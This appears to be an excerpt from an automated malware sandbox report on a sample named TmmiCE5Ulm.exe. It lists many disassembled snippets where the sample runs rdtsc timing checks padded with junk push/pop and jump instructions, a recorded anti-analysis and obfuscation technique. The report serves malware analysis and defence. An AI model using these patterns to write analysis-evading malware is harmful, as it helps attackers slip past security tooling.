                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 900F88 second address: 900F92 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F05F0F59496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 900F92 second address: 900FB0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F05F0F49762h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 900FB0 second address: 900FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 902F0F second address: 902F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 902F15 second address: 902F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FD1E4 second address: 8FD1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FFFCA second address: 8FFFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9010D5 second address: 901138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+12460D09h] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F05F0F49758h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 mov edi, 61011093h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 cmc 0x00000041 mov eax, dword ptr [ebp+122D04F5h] 0x00000047 push FFFFFFFFh 0x00000049 pushad 0x0000004a sub dword ptr [ebp+124719C9h], ebx 0x00000050 popad 0x00000051 nop 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 js 00007F05F0F49756h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 90314D second address: 903153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 905537 second address: 905555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05F0F49765h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 903153 second address: 903175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9057F8 second address: 905802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F05F0F49756h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F1658 second address: 8F1672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F594A6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 950A54 second address: 950A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 950A5A second address: 950A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 950392 second address: 9503C8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F05F0F49756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F05F0F49767h 0x00000011 jmp 00007F05F0F49763h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9503C8 second address: 9503CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9580D8 second address: 9580DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9580DE second address: 9580EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 958F5A second address: 958F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F4975Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95D2C4 second address: 95D2D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F594A0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95D588 second address: 95D597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95D597 second address: 95D5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F05F0F594A9h 0x0000000b popad 0x0000000c jc 00007F05F0F594A6h 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95D87B second address: 95D891 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F05F0F4975Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95D891 second address: 95D895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95D895 second address: 95D899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DC4B second address: 95DC51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DC51 second address: 95DC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F05F0F49756h 0x00000010 jmp 00007F05F0F49761h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DC72 second address: 95DC90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A8h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DC90 second address: 95DC96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DC96 second address: 95DCA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F05F0F59496h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DCA0 second address: 95DCAA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F05F0F49756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DCAA second address: 95DCD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F05F0F594A8h 0x0000000c jmp 00007F05F0F5949Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 95DE53 second address: 95DE58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 969D24 second address: 969D29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 96A546 second address: 96A554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F4975Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 96AA9E second address: 96AABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A7h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 96AABA second address: 96AABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 96AABF second address: 96AAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F05F0F594A3h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jl 00007F05F0F59496h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 972226 second address: 97222A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 97237D second address: 972396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F05F0F594A0h 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 972396 second address: 9723AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F05F0F49760h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9723AB second address: 9723C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F05F0F5949Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9723C1 second address: 9723C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9723C5 second address: 9723E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9723E2 second address: 9723E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9723E8 second address: 9723EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9723EE second address: 9723F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 97FB7D second address: 97FB87 instructions: 0x00000000 rdtsc 0x00000002 je 00007F05F0F5949Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 97FB87 second address: 97FB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 97FD34 second address: 97FD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 97FD3A second address: 97FD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F05F0F49756h 0x00000010 jbe 00007F05F0F49756h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 97FD50 second address: 97FD5A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F05F0F59496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 97FD5A second address: 97FD60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9846E1 second address: 9846E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 991B8B second address: 991BB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Fh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F05F0F49761h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999E05 second address: 999E0F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F05F0F59496h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999E0F second address: 999E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999E1A second address: 999E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A0h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F05F0F59498h 0x00000013 push ebx 0x00000014 jmp 00007F05F0F594A0h 0x00000019 pop ebx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999E4C second address: 999E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49763h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999F96 second address: 999FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F5949Eh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999FAC second address: 999FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F05F0F49765h 0x0000000a jmp 00007F05F0F4975Bh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999FD9 second address: 999FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05F0F5949Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999FF0 second address: 999FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 999FF4 second address: 999FFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 99A2E2 second address: 99A30D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 jnl 00007F05F0F4975Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F05F0F49764h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 99F7F4 second address: 99F7FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 99F7FE second address: 99F802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 99F802 second address: 99F806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9A83A3 second address: 9A83A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9A83A9 second address: 9A83D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop esi 0x0000000d popad 0x0000000e jc 00007F05F0F594BAh 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9BF32D second address: 9BF33C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F05F0F49756h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9BF33C second address: 9BF35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9BF03E second address: 9BF048 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F05F0F4975Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9BF048 second address: 9BF062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F05F0F594A4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9D55DC second address: 9D55E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9D5722 second address: 9D573A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A3h 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9D5E1D second address: 9D5E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9D5E21 second address: 9D5E25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9D5E25 second address: 9D5E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F05F0F49769h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9D5E46 second address: 9D5E6C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F05F0F594B1h 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA68B second address: 9DA6AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA6AE second address: 9DA6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA6B2 second address: 9DA6FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F05F0F4975Ch 0x0000000f popad 0x00000010 nop 0x00000011 jnp 00007F05F0F4975Ch 0x00000017 push 00000004h 0x00000019 mov dh, 8Ch 0x0000001b push 60AD4BB4h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jbe 00007F05F0F49756h 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA6FB second address: 9DA700 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA949 second address: 9DA9A8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F05F0F49758h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dx, si 0x0000000e mov dx, si 0x00000011 push dword ptr [ebp+122D37A8h] 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F05F0F49758h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 clc 0x00000032 call 00007F05F0F49759h 0x00000037 pushad 0x00000038 ja 00007F05F0F49763h 0x0000003e push eax 0x0000003f push edx 0x00000040 jnl 00007F05F0F49756h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA9A8 second address: 9DA9AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA9AC second address: 9DA9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jp 00007F05F0F4975Eh 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DA9BD second address: 9DA9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 ja 00007F05F0F594AFh 0x0000000f mov eax, dword ptr [eax] 0x00000011 jc 00007F05F0F594A0h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 9DDA76 second address: 9DDA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F05F0F49756h 0x0000000a rdtsc
